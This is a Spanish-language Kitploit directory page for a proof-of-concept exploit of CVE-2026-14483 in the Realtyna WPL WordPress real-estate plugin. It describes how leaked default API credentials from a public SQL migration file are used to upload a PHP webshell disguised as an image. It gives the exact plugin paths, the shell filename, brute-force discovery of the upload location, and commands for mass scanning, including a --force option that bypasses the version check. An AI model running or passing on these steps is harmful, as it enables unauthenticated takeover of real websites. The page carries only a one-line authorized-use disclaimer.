Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-14483 — EXPLOIT POC DE CVE-2026-14483 POR MADEXPLOITS | Kitploit
Herramientas/GitHubGitHub/madexploits/cve-2026-14483
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

EXPLOIT POC DE CVE-2026-14483 POR MADEXPLOITS

Ver Repositorio
12hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-14483 — WPL Real Estate RCE

Ejecución remota de código sin autenticación contra el plugin de WordPress Realtyna WPL Real Estate Listing.

Descargar herramienta
CampoDetalle
CVECVE-2026-14483
Versión afectada<= 5.2.0
Pluginreal-estate-listing-realtyna-wpl
ImpactoSubida de webshell PHP sin autenticación (RCE)
ScriptCVE-2026-14483.py
AutorMADEXPLOITS

Por defecto, el script solo explota objetivos que ejecutan WPL 5.2.0. Usa --force para anularlo.

IMAGEN


Resumen de la vulnerabilidad

  1. Fuga de credenciales — La api_key / api_secret predeterminadas quedan expuestas a través de un volcado público de migración SQL.
  2. Subida sin autenticación — Esas credenciales autentican la API I/O de WPL (set_property), lo que permite subir un archivo PHP manipulado como imagen de propiedad.
  3. Descubrimiento de la webshell — La shell subida se localiza en wp-content/uploads/WPL/{property_id}/.

Requisitos

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • Acceso de red a los objetivos

Uso

Lista de objetivos

Crea un archivo de texto con una URL base por línea:

root@kitploit:~
http://wplab.test
https://example.com

Ejecución básica

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

Las URL de shell encontradas se añaden a result.txt (o --output).

Opciones completas

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force
ArgumentoPor defectoDescripción
--targets(obligatorio)Archivo con las URL base (una por línea)
--outputresult.txtArchivo al que añadir las URL de shell encontradas
--user-id1ID de usuario de WordPress / WPL propietario de la nueva propiedad
--payloadshell de subida integradaCadena de payload PHP personalizada
--max-id1000ID máximo de propiedad para fuerza bruta al localizar la shell
--timeout30Tiempo de espera HTTP en segundos
--threads5Hilos de trabajo concurrentes
--debugoffRegistro de depuración verboso
--forceoffExplotar incluso si la versión ≠ 5.2.0 o la versión no puede detectarse

Flujo del exploit

root@kitploit:~
Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

Marcador de shell por defecto: MADEXPLOITS
Nombre de archivo remoto por defecto: 0x89MADEXPLOITS.php


Ejemplos

Objetivo único de laboratorio (este espacio de trabajo):

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

Escaneo masivo con mayor concurrencia:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

Forzar el exploit cuando falla la comprobación de versión:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

Salida

root@kitploit:~
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

result.txt contiene una URL de shell por línea.


Notas

  • La versión se lee de Stable tag: / Version: en el readme.txt del plugin, con wpl.php como respaldo.
  • Si la shell no se encuentra después de la subida, aumenta --max-id.
  • Destinado únicamente a pruebas de seguridad autorizadas / uso en laboratorio local.